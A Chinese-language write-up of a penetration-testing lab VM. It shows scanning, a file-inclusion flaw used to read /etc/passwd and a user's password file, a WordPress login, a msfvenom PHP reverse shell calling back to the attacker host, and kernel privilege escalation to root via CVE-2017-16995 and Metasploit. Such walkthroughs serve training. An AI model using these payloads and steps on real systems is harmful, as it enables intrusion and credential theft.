下载地址:点我
哔哩哔哩:点我
信息收集
- 下载完解压后导入虚拟机,发现是一个Ubuntu,还是桌面版的
- 把网卡设置为Host-Only,也就是vmnet1,网段为
192.168.116.1/24
- 先nmap扫存活主机
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:16 CST
Nmap scan report for 192.168.116.1
Host is up (0.00044s latency).
Nmap scan report for 192.168.116.132
Host is up (0.00063s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.54 seconds
➜ ~
- 找到IP为
192.168.116.132
,再扫开放端口服务。
➜ ~ nmap -A -T4 192.168.116.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:17 CST
Nmap scan report for 192.168.116.132
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.13 seconds
- 发现开放了80端口,一般突破点在Web,浏览器打开看到只有一张图片。F12无果。
- 先上nikto扫一波。
➜ ~ nikto --host http://192.168.116.132/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.116.132
+ Target Hostname: 192.168.116.132
+ Target Port: 80
+ Start Time: 2019-09-20 07:22:14 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://192.168.116.132/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2019-09-20 07:22:26 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- 发现是一个Wordpress,可以格式化后查看一下有什么可以用的信息。从数据上看像是一个API接口的路由文档,详细去看一下:http://v2.wp-api.org/,既然是WordPress就用Wpscan测试下。
➜ ~ wpscan --url http://192.168.116.132/wordpress/
_______________________________________________________________
__ _______ _____
/ / __ / ____|
/ / /| |__) | (___ ___ __ _ _ __ ®
/ / / | ___/ \___ / __|/ _` | '_
/ / | | ____) | (__| (_| | | | |
/ / |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.116.132/wordpress/
[+] Started: Fri Sep 20 07:56:20 2019
Interesting Finding(s):
[+] http://192.168.116.132/wordpress/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.116.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.116.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.116.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.116.132/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.116.132/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.116.132/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Stored Comments
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9861
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16218
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
| [!] Title: WordPress 5.2.2 - Authenticated Cross-Site Scripting (XSS) in Post Previews
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9862
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16223
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
| [!] Title: WordPress 5.2.2 - Potential Open Redirect
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9863
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16220
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/c86ee39ff4c1a79b93c967eb88522f5c09614a28
|
| [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9864
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://fortiguard.com/zeroday/FG-VD-18-165
| - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
|
| [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Dashboard
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9865
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16221
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/
| Latest Version: 1.4 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/readme.txt
| Style URL: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Fri Sep 20 07:56:22 2019
[+] Requests Done: 49
[+] Cached Requests: 5
[+] Data Sent: 12.599 KB
[+] Data Received: 462.296 KB
[+] Memory used: 184.582 MB
[+] Elapsed time: 00:00:02
➜ ~
- 没发现什么东西,发现一个目录索引枚举:
http://192.168.116.132/wordpress/wp-content/uploads/2019/08/
,继续扫目录。
➜ ~ dirb http://192.168.116.132/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 20 08:11:33 2019
URL_BASE: http://192.168.116.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.132/ ----
+ http://192.168.116.132/dev (CODE:200|SIZE:131)
+ http://192.168.116.132/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.116.132/javascript/
+ http://192.168.116.132/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.116.132/wordpress/
---- Entering directory: http://192.168.116.132/javascript/ ----
==> DIRECTORY: http://192.168.116.132/javascript/jquery/
---- Entering directory: http://192.168.116.132/wordpress/ ----
+ http://192.168.116.132/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-includes/
+ http://192.168.116.132/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.116.132/javascript/jquery/ ----
+ http://192.168.116.132/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/ ----
+ http://192.168.116.132/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/includes/
+ http://192.168.116.132/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/user/
---- Entering directory: http://192.168.116.132/wordpress/wp-content/ ----
+ http://192.168.116.132/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.116.132/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/network/ ----
+ http://192.168.116.132/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.116.132/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/user/ ----
+ http://192.168.116.132/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.116.132/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-content/plugins/ ----
+ http://192.168.116.132/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-content/themes/ ----
+ http://192.168.116.132/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Sep 20 08:12:01 2019
DOWNLOADED: 46120 - FOUND: 15
➜ ~
- 发现有提示文件,找到了第0阶段。提示要用他们的工具去挖掘Web信息。
➜ ~ curl http://192.168.116.132/dev
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
➜ ~
- 加上-X参数指定扫描的后缀名。
➜ ~ dirb http://192.168.116.132/ -X .php,.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 20 08:18:05 2019
URL_BASE: http://192.168.116.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.txt) | (.php)(.txt) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.132/ ----
+ http://192.168.116.132/image.php (CODE:200|SIZE:147)
+ http://192.168.116.132/index.php (CODE:200|SIZE:136)
+ http://192.168.116.132/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Fri Sep 20 08:18:10 2019
DOWNLOADED: 9224 - FOUND: 3
➜ ~
Fuzz
- 发现另一个提示,准备好模糊测试的工具。
➜ ~ curl http://192.168.116.132/secret.txt
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//
➜ ~
- 打开链接看到是一个wfuzz的教程,当然里面的字典没有给你,这里推荐两个fuzz的项目:
https://github.com/fuzzdb-project/fuzzdb
,https://github.com/danielmiessler/SecLists
有各种常见的字典,可以fork一个自己慢慢添加。一般我会在zshrc文件中设置环境变量指定字典目录,这样就不用敲目录了。 - 和我之前写的一篇套路一模一样:点我参考,先找出文件再测试方法参数,和爆破一句话木马差不多。
➜ ~ wfuzz -c -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 7 L 12 W 136 Ch "0"
000000002: 200 7 L 12 W 136 Ch "1"
000000003: 200 7 L 12 W 136 Ch "add"
000000004: 200 7 L 12 W 136 Ch "admin"
000000005: 200 7 L 12 W 136 Ch "alert"
000000006: 200 7 L 12 W 136 Ch "alter"
000000007: 200 7 L 12 W 136 Ch "auth"
000000008: 200 7 L 12 W 136 Ch "authenticate"
000000009: 200 7 L 12 W 136 Ch "append"
000000010: 200 7 L 12 W 136 Ch "calc"
000000011: 200 7 L 12 W 136 Ch "calculate"
000000012: 200 7 L 12 W 136 Ch "cancel"
000000013: 200 7 L 12 W 136 Ch "change"
000000014: 200 7 L 12 W 136 Ch "check"
000000016: 200 7 L 12 W 136 Ch "click"
000000015: 200 7 L 12 W 136 Ch "clear"
000000017: 200 7 L 12 W 136 Ch "clone"
000000018: 200 7 L 12 W 136 Ch "close"
000000019: 200 7 L 12 W 136 Ch "create"
000000020: 200 7 L 12 W 136 Ch "crypt"
000000021: 200 7 L 12 W 136 Ch "decrypt"
000000022: 200 7 L 12 W 136 Ch "del"
000000023: 200 7 L 12 W 136 Ch "delete"
000000024: 200 7 L 12 W 136 Ch "demo"
000000025: 200 7 L 12 W 136 Ch "disable"
000000026: 200 7 L 12 W 136 Ch "dl"
000000027: 200 7 L 12 W 136 Ch "download"
000000029: 200 7 L 12 W 136 Ch "enable"
000000030: 200 7 L 12 W 136 Ch "encrypt"
000000028: 200 7 L 12 W 136 Ch "edit"
000000031: 200 7 L 12 W 136 Ch "exec"
000000032: 200 7 L 12 W 136 Ch "execute"
000000033: 200 7 L 19 W 206 Ch "file"
000000034: 200 7 L 12 W 136 Ch "focus"
000000035: 200 7 L 12 W 136 Ch "get"
000000036: 200 7 L 12 W 136 Ch "help"
000000037: 200 7 L 12 W 136 Ch "initiate"
000000038: 200 7 L 12 W 136 Ch "is"
000000041: 200 7 L 12 W 136 Ch "ls"
000000042: 200 7 L 12 W 136 Ch "make"
000000043: 200 7 L 12 W 136 Ch "mod"
000000044: 200 7 L 12 W 136 Ch "mode"
000000046: 200 7 L 12 W 136 Ch "move"
000000047: 200 7 L 12 W 136 Ch "new"
000000048: 200 7 L 12 W 136 Ch "off"
000000049: 200 7 L 12 W 136 Ch "on"
000000039: 200 7 L 12 W 136 Ch "list"
000000040: 200 7 L 12 W 136 Ch "load"
000000045: 200 7 L 12 W 136 Ch "modify"
000000050: 200 7 L 12 W 136 Ch "open"
000000054: 200 7 L 12 W 136 Ch "put"
000000055: 200 7 L 12 W 136 Ch "query"
000000056: 200 7 L 12 W 136 Ch "read"
000000051: 200 7 L 12 W 136 Ch "post"
000000052: 200 7 L 12 W 136 Ch "proxy"
000000053: 200 7 L 12 W 136 Ch "pull"
000000062: 200 7 L 12 W 136 Ch "save"
000000058: 200 7 L 12 W 136 Ch "rename"
000000060: 200 7 L 12 W 136 Ch "retrieve"
000000061: 200 7 L 12 W 136 Ch "run"
000000057: 200 7 L 12 W 136 Ch "remove"
000000059: 200 7 L 12 W 136 Ch "reset"
000000063: 200 7 L 12 W 136 Ch "search"
000000064: 200 7 L 12 W 136 Ch "send"
000000065: 200 7 L 12 W 136 Ch "shell"
000000066: 200 7 L 12 W 136 Ch "show"
000000070: 200 7 L 12 W 136 Ch "to"
000000071: 200 7 L 12 W 136 Ch "toggle"
000000072: 200 7 L 12 W 136 Ch "update"
000000073: 200 7 L 12 W 136 Ch "upload"
000000074: 200 7 L 12 W 136 Ch "verify"
000000075: 200 7 L 12 W 136 Ch "view"
000000076: 200 7 L 12 W 136 Ch "vrfy"
000000067: 200 7 L 12 W 136 Ch "snd"
000000068: 200 7 L 12 W 136 Ch "subtract"
000000069: 200 7 L 12 W 136 Ch "test"
000000077: 200 7 L 12 W 136 Ch "with"
Total time: 0.083242
Processed Requests: 77
Filtered Requests: 0
Requests/sec.: 925.0118
➜ ~ wfuzz -c --hh 136 -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000033: 200 7 L 19 W 206 Ch "file"
Total time: 0.118026
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 652.3932
➜ ~
- fuzz出来index.php可以接受file参数,
http://192.168.116.132/index.php?file=/ect/passed
,和之前的首页长度不同。在上面提示中可以试着读取http://192.168.116.132/index.php?file=location.txt
,又发现一个提示。
➜ ~ curl http://192.168.116.132/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>
➜ ~
- 提示到其他页面测试secrettier360这个参数,在dirb扫出来的一个就两个特殊的php文件。所以就是
http://192.168.116.132/image.php
,加上secrettier360
继续fuzz测试。发现存在任意文件读取http://192.168.116.132/image.php?secrettier360=/etc/passwd
,读取/etc/passed
➜ ~ curl http://192.168.116.132/image.php?secrettier360=/etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
</html>
➜ ~
- 有一个访客的账号,还有一个victor账号,然后发现访客账号可以直接登录,在正常情况下是不可能可以登录到服务器的。在服务器开放了VNC服务,才有可能登录访客账号。
root:x:0:0:root:/root:/bin/bash
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
- 登录进访客账号,发现/opt目录下有一个服务器备份文件夹
your password for backup_database file enc is
"backup_password"
Enjoy!
- 后来查看Linux版本,发现可以直接提权。额,这样就很没意思了,本来就很没意思。反正到最后还是要用到EXP去提权的,但是不是直接登录访客账号。而且访客提权还把Web服务提挂了。
guest-uw1hdg@ubuntu:~/Desktop$ gcc exp.c
guest-uw1hdg@ubuntu:~/Desktop$ ./a.out
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff955bf2847500
[*] Leaking sock struct from ffff955bef6a6c00
[*] Sock->sk_rcvtimeo at offset 592
[*] Cred structure at ffff955bf0c7e0c0
[*] UID from cred structure: 999, matches the current: 999
[*] hammering cred structure at ffff955bf0c7e0c0
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),999(guest-uw1hdg)
#
走正常流程
- 目标是拿到saket用户目录的password.txt文件。尝试
http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt
,得到密码为:follow_the_ippsec
➜ ~ curl http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>
➜ ~
- 在WordPress的文章里找作者的用户名,就只有一篇文章,作者是
victor
,账号密码登录,所以在WordPress中要设置作者的别名,不会被别人猜出来登录账号。 - 进入后台上传木马,这些就不用说了。各种各样的方法,修改主题。
➜ ~ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.116.1 LPORT=7788 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30656 bytes
Saved as: shell.php
msf5 > use exploit/m
Display all 313 possibilities? (y or n)
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lport 7788
lport => 7788
msf5 exploit(multi/handler) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.116.1:7788
[*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.132:43802) at 2019-09-20 11:31:27 +0800
- 交互终端:python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@ubuntu:/home/saket$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home/saket$
- CVE-2017-16995提权,
https://github.com/SecWiki/linux-kernel-exploits/tree/master/2017/CVE-2017-16995
- 上传到服务器然后gcc编译执行就可以拿到Root权限了。
- 或者用msf自带的
msf5 exploit(multi/handler) > use exploit/linux/local/bpf_sign_extension_priv_esc
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Writing '/tmp/.Glz23KY6oY.c' (10867 bytes) ...
[*] Writing '/tmp/.UaPN30M' (207 bytes) ...
[*] Launching exploit ...
[*] Sending stage (985320 bytes) to 192.168.116.132
[*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.132:48326) at 2019-09-20 12:40:28 +0800
meterpreter > sysinfo
Computer : 192.168.116.132
OS : Ubuntu 16.04 (Linux 4.10.0-28-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > shell
Process 2362 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
非EXP提权
其实saket目录下有一个enc的执行文件,执行后输入上面找到的backup_pass的密码,复制了两个文件到saket的home目录,拿到enc.txt和key.txt。
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password: backup_password
backup_password
good
/bin/cp: cannot stat '/root/enc.txt': Permission denied
/bin/cp: cannot stat '/root/key.txt': Permission denied
www-data@ubuntu:/home/saket$ whoami
whoami
www-data
www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
backup_password
good
www-data@ubuntu:/home/saket$ ls
ls
enc enc.txt key.txt password.txt user.txt
www-data@ubuntu:/home/saket$
- 解密后base64解码后得到saket的密码为
tribute_to_ippsec
